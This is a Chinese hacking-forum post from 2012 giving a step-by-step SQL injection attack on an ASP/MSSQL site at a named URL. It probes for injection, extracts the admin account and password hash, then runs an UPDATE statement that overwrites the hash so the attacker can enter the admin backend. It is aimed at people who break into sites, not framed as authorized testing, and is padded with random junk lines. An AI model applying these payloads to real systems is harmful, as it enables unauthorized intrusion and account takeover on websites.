中国网络渗透测试联盟
标题:
SQL注入直接修改管理员密码的MD5值
[打印本页]
作者:
admin
时间:
2012-9-13 17:55
标题:
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
1 b% S; C3 F! O& K
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
9 Z- {3 O1 o$ O; \4 A
测试如下:
" P) U' _' ^+ S: d1 `* _* ]
http://www.tmdsb.com/news.asp?id=121
' u' B) k/ V& f& y
在地址后输入单引号,显示
5 T) K, f1 F' K1 [, A+ U% h& v' `
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
' `. {9 N8 _0 O( l
字符串 ’’’ 之前有未闭合的引号
) ~4 O* X* ]" Z+ p
/news/tmdws.asp,行63
7 m- h6 l2 p8 L8 u
说明没有过滤单引号且数据库是MSSQL.
8 c' y1 I o. ]0 |1 t/ Y! N! Q
and 1=1正常。and 1=2出错。肯定存在注入
$ A) w, ~4 f( a! g
接着输入
) }. i$ q F0 g b% n& ~. G) k
http://www.tmdsb.com/news.asp?id=1
or admin_user in (select id from admin)
7 ?5 A B* J, U1 G6 C7 q
得到帐号为:admin
/ \% [9 `' m8 s. m: f
http://www.tmdsb.com/news.asp?id=121
or admin_password in (select id from admin)
2 G7 [# p6 c, R* W% v6 B* w: M! u
得到密码为:a4716077c2ba075c
9 o; B/ S7 b, b5 Y5 F0 x
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
+ a- R5 \! S( N9 u
命令如下 :
0 S1 Q& q& Y2 q# Q( |( K7 T+ l; W r' [
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
I' x: f3 H8 k4 o3 }/ }( O7 B
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者:
angel
时间:
2012-9-14 16:22
没法说 一个字牛
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2